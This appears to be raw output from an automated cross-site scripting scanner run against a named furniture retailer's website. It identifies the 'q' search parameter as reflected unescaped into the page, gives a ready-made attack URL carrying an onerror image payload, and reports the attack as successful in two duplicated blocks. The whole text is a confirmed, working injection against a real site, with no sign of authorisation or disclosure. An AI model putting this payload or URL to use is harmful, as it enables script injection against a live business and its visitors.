https://www.worthingtondirect.com/desks/chair-desk-combos.htm

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.worthingtondirect.com/furniturelisting.cfm?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [2]
<h1 itemprop="name">Products matching "(uvw"xyz'yxz</zxy"</h1>
<strong>(uvw"xyz'yxz</zxy</strong>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	False	False

Attack Payloads for HTML
['<img src=x onerror="alert(1)">']

HTML Attack Url: https://www.worthingtondirect.com/furniturelisting.cfm?q=<img src=x onerror="alert(1)">

=> ATTACK SUCCESSFUL with Payload: <img src=x onerror="alert(1)">
Detection of Payload: 
<h1 itemprop="name">Products matching "<img src=x onerror="alert(1)">"</h1>
<strong><img src=x onerror="alert(1)"></strong>
ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	False	False

Attack Payloads for HTML
['<img src=x onerror="alert(1)">']

HTML Attack Url: https://www.worthingtondirect.com/furniturelisting.cfm?q=<img src=x onerror="alert(1)">

=> ATTACK SUCCESSFUL with Payload: <img src=x onerror="alert(1)">
Detection of Payload: 
<h1 itemprop="name">Products matching "<img src=x onerror="alert(1)">"</h1>
<strong><img src=x onerror="alert(1)"></strong>
